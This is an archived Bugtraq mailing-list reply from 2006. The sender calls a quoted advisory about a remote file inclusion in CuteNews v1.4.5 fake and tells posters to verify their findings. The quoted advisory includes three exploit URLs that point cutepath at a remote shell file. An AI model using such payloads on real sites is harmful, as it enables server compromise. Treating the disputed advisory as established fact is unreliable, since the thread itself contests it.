Bugtraq mailing list archives

Re: CuteNews v1.4.5 (search.php) Remote file include vulnerability

From: raven <locrideweb () libero it>
Date: Tue, 28 Nov 2006 11:58:46 +0100

The question is:
Why who "find" a vuln, not check that is a really vuln ?

Send faked vuln advisory is stupid and useless...for me... Bugtraq is asecurity mailinglist and there who post need to guarantee that is a realmistake. I cant believe that everytime that anyone send something,another person, write: "Is a bogus" "Not is a real vulnerability" orsomething like this...

Posters, check what you find, before send here.
Regards,
Francesco Vollero


philip anselmo ha scritto:

Title : CuteNews v1.4.5 (search.php) Remote file include
########################################################################
#######

Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}

------------------------------------------------------------------------
Sorce Code:
**********
http://cutephp.com/

Affected software description :
******************************
vendor site: http://cutephp.com/
Application : CuteNews v1.4.5
Catégorie :Remote File Include
------------------------------------------------------------------------
Vulnerable Code:
***************
require_once("$cutepath/inc/functions.inc.php");
require_once("$cutepath/data/config.php");

affected file: search.php & show_news.php & show_archives.php
----------------------------------------------------------------------
Exploit:
*******
http://www.VicTim.com/[Script_Path]/show_archives.php?cutepath=Shell.txt?
http://www.VicTim.com/[Script_Path]/show_news.php?cutepath=Shell.txt?
http://www.VicTim.com/[Script_Path]/search.php?cutepath=Shell.txt?

------------------------------------------------------------------------
----

greetz:Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco-Faiçeu-YouSSeF-allmy friends


Special Greeting:AsbMay's Group & TrYaG TeaM

channel:www.asb-may.net & www.tryag.com

contact:spoonman500[at]hotmail[dot]com / ThE-LoRd-Of-CrAcKiNg () hotmail com

_________________________________________________________________

MSN Messenger : discutez en direct avec vos amis !http://www.msn.fr/msger/default.asp

Current thread:

CuteNews v1.4.5 (search.php) Remote file include vulnerability philip anselmo (Nov 27)
- Re: CuteNews v1.4.5 (search.php) Remote file include vulnerability Francesco Laurita (Nov 27)
- Re: CuteNews v1.4.5 (search.php) Remote file include vulnerability raven (Nov 29)